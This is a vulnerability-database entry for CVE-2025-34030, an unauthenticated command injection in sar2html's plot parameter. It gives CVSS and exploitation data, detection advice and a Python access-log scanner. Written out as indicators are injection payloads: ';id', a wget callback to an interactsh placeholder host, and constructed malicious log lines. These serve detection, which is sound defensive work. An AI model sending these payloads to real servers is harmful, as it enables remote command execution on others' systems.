CVE-2025-34030
published 2025-06-20

CVE-2025-34030: An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize…

Priority: P1 · 92 · critical 10 (CVSS 4.0)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Flags: ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 59.07% (99.0th percentile)
An OS command injection vulnerability exists in sar2html version 3.2.2 and prior via the plot parameter in index.php. The application fails to sanitize user-supplied input before using it in a system-level context. Remote, unauthenticated attackers can inject shell commands by appending them to the plot parameter (e.g., ?plot=;id) in a crafted GET request. The output of the command is displayed in the application's interface after interacting with the host selection UI. Successful exploitation leads to arbitrary command execution on the underlying system. Exploitation evidence was observed by the Shadowserver Foundation on 2025-02-04 UTC.

Affected

1 range

Vendor      Product     Version range   Fixed in
sar2html    sar2html    <= 3.2.2        (not listed)

Detection & IOCs (extracted from sources)

url: /index.php?plot=;wget%20http://{{interactsh-url}}
path: /index.php
command: ?plot=;id
  • Detect OS command injection attempts via the 'plot' parameter in GET requests to index.php: URL-decode the parameter value (attackers commonly send %3B for the semicolon) and look for shell metacharacters such as ';', '|', backticks or '$(' at the start of or inside the value.
  • Match HTTP responses containing both the 'sar2html Ver' and 'Select Host' strings to confirm that a sar2html instance was reached; the version number that follows 'sar2html Ver' tells you whether it is at or below 3.2.2.
  • Monitor for outbound HTTP/DNS callback requests (OAST/interactsh) originating from the web server process following requests to index.php with a semicolon-prefixed plot parameter; such a callback is direct evidence that the injected command executed.
  • Active exploitation in the wild was observed by the Shadowserver Foundation on 2025-02-04 UTC; treat any matching request as a high-confidence exploitation attempt, and as a compromise once a callback, command output in the host list, or a child process spawned by the web server confirms execution.
  • The vulnerability is exploitable by unauthenticated, remote attackers: no credentials or prior access are required, maximising exposure on any internet-facing sar2html deployment.
  • Command output is only rendered in the UI after interacting with the host selection element, so passive log-only monitoring of HTTP responses may miss successful exploitation; request-side detection and process/egress monitoring on the host are more reliable.
  • Affected versions are 3.2.2 and prior and no fixed version is listed, so scope detections to every reachable sar2html instance and verify the version from the page banner rather than assuming any deployment is patched.
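The request-side and response-side checks above, as an added example that is not part of this database entry or of sar2html itself: a Python scanner that reads Apache combined-format access log lines, URL-decodes the plot parameter of any request to index.php (decoding a second time to catch double-encoded payloads), flags shell metacharacters, and fingerprints a response body with the two strings the sources name. The log lines, IP addresses, hostnames and timestamps are constructed for the example and do not describe real traffic.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2025:10:15:01 +0000] "GET /index.php?plot=;id HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [04/Feb/2025:10:15:02 +0000] "GET /index.php?plot=%3Bwget%20http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 5120 "-" "curl/8.5.0"
198.51.100.2 - - [04/Feb/2025:10:16:00 +0000] "GET /index.php?plot=cpu HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.2 - - [04/Feb/2025:10:16:05 +0000] "GET /index.php?plot=cpu&host=srv01 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [04/Feb/2025:10:17:00 +0000] "GET /sar2html/index.php?plot=%60id%60 HTTP/1.1" 200 5120 "-" "curl/8.5.0"
203.0.113.7 - - [04/Feb/2025:10:17:30 +0000] "GET /index.php?plot=%253Bid HTTP/1.1" 200 5120 "-" "curl/8.5.0"
"""

# Characters that let a value break out of the intended shell argument.
# '&' only survives in a parsed value if it was sent encoded (%26), which is
# itself a sign of injection; a bare '&' is a query-string separator.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})'
)


def plot_injection(target: str) -> Optional[dict]:
    """Return details if `target` is a request to index.php whose plot
    parameter carries a shell metacharacter, otherwise None."""
    parts = urlsplit(target)
    # sar2html may live under a sub-path, so only the final segment matters.
    if not parts.path.lower().endswith("/index.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    for raw in qs.get("plot", []):
        # parse_qs already decoded once; decode again for double-encoded payloads.
        for candidate in (raw, unquote_plus(raw)):
            m = SHELL_META.search(candidate)
            if m:
                return {"path": parts.path, "plot": candidate, "metachar": m.group(0)}
    return None


def scan_access_log(text: str) -> list:
    """Apply plot_injection() to every parseable line and return the hits
    with source address, timestamp and response status attached."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        finding = plot_injection(m["target"])
        if finding:
            finding.update(src=m["src"], ts=m["ts"], status=m["status"])
            hits.append(finding)
    return hits


def is_sar2html_page(body: str) -> bool:
    """Response-side fingerprint from the sources: both strings must be present."""
    return "sar2html Ver" in body and "Select Host" in body


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['path']} plot={hit['plot']!r} "
              f"via {hit['metachar']!r} (status {hit['status']})")
```

Feeding a real log through scan_access_log() surfaces attempts regardless of encoding; pair a hit with is_sar2html_page() on the captured response, or with the callback and process-spawn evidence described above, before calling it a compromise.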

CVSS provenance

NVD: CVSS 4.0, 10.0 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
VulnCheck: 10.0 CRITICAL